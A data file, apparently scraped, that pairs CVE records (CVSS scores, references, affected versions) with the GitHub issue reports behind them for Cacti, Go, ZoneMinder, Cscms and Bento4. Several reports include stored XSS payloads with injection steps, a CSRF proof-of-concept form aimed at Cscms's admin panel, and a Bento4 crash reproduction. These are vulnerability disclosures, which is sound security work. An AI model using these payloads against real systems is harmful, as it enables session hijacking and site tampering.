"version": "3.0"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html"
},
{
"source": "[email protected]",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/blob/develop/CHANGELOG"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/commit/80c2a88fb2afb93f87703ba4641f9970478c102d"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/issues/2215"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341",
"versionEndExcluding": "1.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Cacti/cacti/issues/2215 | [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
] | github.com | [
"Cacti",
"cacti"
] | **Description** -
There's no escape being done before printing out the value of `Name` in the Color Template page.
<br>
**Cacti version** - v1.1.38
<br>
**Steps to reproduce** -
- Navigate to http://localhost:4040/cacti/color_templates.php?action=template_edit & add the below shared payload as the `Name` field value.
Payload - `<img src=xss onerror=alert(1)>`
- Visit http://localhost:4040/cacti/color_templates.php?action=template_edit, the payload will be triggered.
<br>
<img width="700" alt="cacti6" src="https://user-images.githubusercontent.com/42465102/50050365-73812180-011e-11e9-8979-94c8c2ccfa9b.png">
<img width="702" alt="cacti7" src="https://user-images.githubusercontent.com/42465102/50050366-73812180-011e-11e9-97b4-8cb0b75acc19.png">
| Stored XSS in "Name" field - Color | https://api.github.com/repos/Cacti/cacti/issues/2215/comments | 1 | 2018-12-16T05:07:28Z | 2020-06-30T05:31:09Z | https://github.com/Cacti/cacti/issues/2215 | 391,436,176 | 2,215 |
CVE-2018-20724 | 2019-01-16T16:29:00.557 | A cross-site scripting (XSS) vulnerability exists in pollers.php in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Website Hostname for Data Collectors. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html"
},
{
"source": "[email protected]",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/blob/develop/CHANGELOG"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/commit/1f42478506d83d188f68ce5ff41728a7bd159f53"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/issues/2212"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341",
"versionEndExcluding": "1.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Cacti/cacti/issues/2212 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Cacti",
"cacti"
] |
**Description** -
There's no escape being done before printing out the value of `Hostname` value in the Data collectors table.
<br>
**Cacti version** - v1.1.38
<br>
**Steps to reproduce** -
- Navigate to http://localhost/cacti/pollers.php?action=edit&id=1 & add the below shared payload as the `Hostname` field value.
Payload - `<img src=xss onerror=alert(1)>`
- Visit http://localhost/cacti/pollers.php, payload will be triggered.
<br>
<img width="732" alt="cacti" src="https://user-images.githubusercontent.com/42465102/50042544-67e41b00-008a-11e9-849c-0ae9d7164810.png">
<img width="730" alt="cacti1" src="https://user-images.githubusercontent.com/42465102/50042557-8813da00-008a-11e9-8ac0-1722a257ae3b.png">
| Stored XSS in "Website Hostname" field - Data Collectors | https://api.github.com/repos/Cacti/cacti/issues/2212/comments | 1 | 2018-12-15T11:31:18Z | 2020-06-30T05:31:10Z | https://github.com/Cacti/cacti/issues/2212 | 391,369,971 | 2,212 |
CVE-2018-20725 | 2019-01-16T16:29:00.620 | A cross-site scripting (XSS) vulnerability exists in graph_templates.php in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Graph Vertical Label. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html"
},
{
"source": "[email protected]",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/blob/develop/CHANGELOG"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/commit/80c2a88fb2afb93f87703ba4641f9970478c102d"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/issues/2214"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341",
"versionEndExcluding": "1.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Cacti/cacti/issues/2214 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Cacti",
"cacti"
] |
**Description** -
There's no escape being done before printing out the value of `Vertical Label` in the Graphic templates page.
<br>
**Cacti version** - v1.1.38
<br>
**Steps to reproduce** -
- Navigate to http://localhost:4040/cacti/graph_templates.php?action=template_edit&id=1 & add the below shared payload as the `Vertical label` field value.
Payload - `label<img src=xss onerror=alert(1)>`
- Visit http://localhost:4040/cacti/graph_templates.php, the payload will be triggered.
<br>
<img width="641" alt="cacti4" src="https://user-images.githubusercontent.com/42465102/50050353-e9d15400-011d-11e9-934a-fdebca472c83.png">
<img width="641" alt="cacti5" src="https://user-images.githubusercontent.com/42465102/50050354-e9d15400-011d-11e9-9ea5-67ed291d8e20.png">
| Stored XSS in "Vertical Label" field - Graph | https://api.github.com/repos/Cacti/cacti/issues/2214/comments | 1 | 2018-12-16T05:03:25Z | 2020-06-30T05:31:09Z | https://github.com/Cacti/cacti/issues/2214 | 391,436,010 | 2,214 |
CVE-2018-20726 | 2019-01-16T16:29:00.697 | A cross-site scripting (XSS) vulnerability exists in host.php (via tree.php) in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Website Hostname field for Devices. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html"
},
{
"source": "[email protected]",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/blob/develop/CHANGELOG"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/commit/80c2a88fb2afb93f87703ba4641f9970478c102d"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/issues/2213"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341",
"versionEndExcluding": "1.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Cacti/cacti/issues/2213 | [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
] | github.com | [
"Cacti",
"cacti"
] |
**Description** -
There's no escape being done before printing out the value of `Hostname` value in the Tree table.
<br>
**Cacti version** - v1.1.38
<br>
**Steps to reproduce** -
- Navigate to http://localhost:4040/cacti/host.php?action=edit&id=1 & add the below shared payload as the `Hostname` field value.
Payload - `<img src=xss onerror=alert(1)>`
- Visit http://localhost:4040/cacti/tree.php?action=edit&id=1, payload will be triggered.
<br>
<img width="683" alt="cacti2" src="https://user-images.githubusercontent.com/42465102/50050299-e6899880-011c-11e9-8e8d-09ea6c58bdfc.png">
<img width="685" alt="cacti3" src="https://user-images.githubusercontent.com/42465102/50050300-e6899880-011c-11e9-9c50-c2e66771488c.png">
| Stored XSS in "Website Hostname" field - Devices | https://api.github.com/repos/Cacti/cacti/issues/2213/comments | 1 | 2018-12-16T04:56:37Z | 2020-06-30T05:31:08Z | https://github.com/Cacti/cacti/issues/2213 | 391,435,648 | 2,213 |
CVE-2019-6486 | 2019-01-24T05:29:00.907 | Go before 1.10.8 and 1.11.x before 1.11.5 mishandles P-521 and P-384 elliptic curves, which allows attackers to cause a denial of service (CPU consumption) or possibly conduct ECDH private key recovery attacks. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00042.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00060.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00011.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00015.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/106740"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/golang/go/commit/42b42f71cf8f5956c09e66230293dfb5db652360"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/golang/go/issues/29903"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/google/wycheproof"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://groups.google.com/forum/#%21topic/golang-announce/mVeX35iXuSw"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/02/msg00009.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4379"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4380"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DC7FF63E-50BB-42D5-ACD6-1F5A9AD7E08D",
"versionEndExcluding": "1.10.8",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9BBC54E7-EA22-4BE9-B1B7-92118786B8A5",
"versionEndExcluding": "1.11.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.11.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/golang/go/issues/29903 | [
"Third Party Advisory"
] | github.com | [
"golang",
"go"
] | A DoS vulnerability in the crypto/elliptic implementations of the P-521 and P-384 elliptic curves may let an attacker craft inputs that consume excessive amounts of CPU.
These inputs might be delivered via TLS handshakes, X.509 certificates, JWT tokens, ECDH shares or ECDSA signatures. In some cases, if an ECDH private key is reused more than once, the attack can also lead to key recovery.
This issue is CVE-2019-6486. It was found and reported by [the Wycheproof project](https://github.com/google/wycheproof). | crypto/elliptic: CPU DoS vulnerability affecting P-521 and P-384 | https://api.github.com/repos/golang/go/issues/29903/comments | 8 | 2019-01-23T21:47:29Z | 2020-03-13T20:17:47Z | https://github.com/golang/go/issues/29903 | 402,444,291 | 29,903 |
CVE-2019-6777 | 2019-01-24T15:29:01.017 | An issue was discovered in ZoneMinder v1.32.3. Reflected XSS exists in web/skins/classic/views/plugin.php via the zm/index.php?view=plugin pl parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2436"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mnoorenberghe/ZoneMinder/commit/59cc65411f02c7e39a270fda3ecb4966d7b48d41"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:1.32.3:*:*:*:*:*:*:*",
"matchCriteriaId": "E5A2481D-4A45-48A2-B7DE-86C7D161F6EA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2436 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
-ZoneMinder v1.32.3
**Describe the bug**
Reflective XSS vulnerability
**To Reproduce**
ZoneMinder has one reflective XSS vulnerabilities
1.plugin.php line 106
The parameters in the request are accepted at 39 lines, and the page is output at 106 lines without verification.
![default](https://user-images.githubusercontent.com/39950310/51591378-ca50f680-1f27-11e9-88f8-38bba2d435c8.png)
![default](https://user-images.githubusercontent.com/39950310/51591391-d8067c00-1f27-11e9-97a5-cc5a643090b7.png)
**Expected behavior**
The vulnerability mcan lead to user information leakage, unauthorized operation
**Debug Logs**
```
<insert debug logs here, please make sure they are within the ``` quotes so they are formatted properly>
```
| Reflective XSS vulnerability | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2436/comments | 3 | 2019-01-23T08:03:50Z | 2019-01-24T20:23:21Z | https://github.com/ZoneMinder/zoneminder/issues/2436 | 402,115,314 | 2,436 |
CVE-2019-6779 | 2019-01-24T19:29:00.197 | Cscms 4.1.8 allows admin.php/links/save CSRF to add, modify, or delete friend links. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms:4.1.8:*:*:*:*:*:*:*",
"matchCriteriaId": "A70E830D-724F-4B4C-A709-0DAAD326DC70",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/chshcms/cscms/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | just use add friend links for example:
After the admin logged in, we can send him a url with these code on that page
PoC:
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:9000/admin.php/links/save" method="POST">
<input type="hidden" name="name" value="test" />
<input type="hidden" name="url" value="http://www.google.com" />
<input type="hidden" name="cid" value="1" />
<input type="hidden" name="pic" value="http://" />
<input type="hidden" name="sid" value="1" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
after he clicked that button, then we can add our malicious link to the friend link:
admin page:
<img width="1224" alt="screen shot 2019-01-24 at 22 32 53" src="https://user-images.githubusercontent.com/17252049/51684919-21d68b80-2028-11e9-9ac6-e8cef2ea321f.png">
homepage:
<img width="910" alt="qq20190124-224351 2x" src="https://user-images.githubusercontent.com/17252049/51685599-965dfa00-2029-11e9-8b25-034e0f431b38.png">
| There is a CSRF vulnerability that can add/modify/delete friend links | https://api.github.com/repos/chshcms/cscms/issues/3/comments | 0 | 2019-01-24T14:51:59Z | 2020-02-27T04:22:34Z | https://github.com/chshcms/cscms/issues/3 | 402,743,077 | 3 |
CVE-2019-6966 | 2019-01-25T23:29:00.237 | An issue was discovered in Bento4 1.5.1-628. The AP4_ElstAtom class in Core/Ap4ElstAtom.cpp has an attempted excessive memory allocation related to AP4_Array<AP4_ElstEntry>::EnsureCapacity in Core/Ap4Array.h, as demonstrated by mp42hls. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/361"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*",
"matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/axiomatic-systems/Bento4/issues/361 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | A crafted input will lead to failed allocate LargeMmapAllocator in Ap4Array.h at Bento4 1.5.1-628.
Triggered by
./mp42hls crash3.mp4
Poc
[poc1.zip](https://github.com/axiomatic-systems/Bento4/files/2795098/poc1.zip)
Bento4 Version 1.5.1-628
The ASAN information is as follows:
```
==56305==ERROR: AddressSanitizer failed to allocate 0xc00003000 (51539619840) bytes of LargeMmapAllocator (errno: 12)
==56305==Process memory map follows:
0x000000400000-0x0000007b4000 /home/jas/Downloads/Bento4-SRC-1-5-1-628/cmakebuild/mp42hls
0x0000009b4000-0x0000009b5000 /home/jas/Downloads/Bento4-SRC-1-5-1-628/cmakebuild/mp42hls
0x0000009b5000-0x000000b5b000 /home/jas/Downloads/Bento4-SRC-1-5-1-628/cmakebuild/mp42hls
0x00007fff7000-0x00008fff7000
0x00008fff7000-0x02008fff7000
0x02008fff7000-0x10007fff8000
0x600000000000-0x602000000000
0x602000000000-0x602000010000
0x602000010000-0x603000000000
0x603000000000-0x603000010000
0x603000010000-0x604000000000
0x604000000000-0x604000010000
0x604000010000-0x606000000000
0x606000000000-0x606000010000
0x606000010000-0x607000000000
0x607000000000-0x607000010000
0x607000010000-0x608000000000
0x608000000000-0x608000010000
0x608000010000-0x60c000000000
0x60c000000000-0x60c000010000
0x60c000010000-0x60d000000000
0x60d000000000-0x60d000010000
0x60d000010000-0x60e000000000
0x60e000000000-0x60e000010000
0x60e000010000-0x611000000000
0x611000000000-0x611000010000
0x611000010000-0x616000000000
0x616000000000-0x616000020000
0x616000020000-0x619000000000
0x619000000000-0x619000020000
0x619000020000-0x621000000000
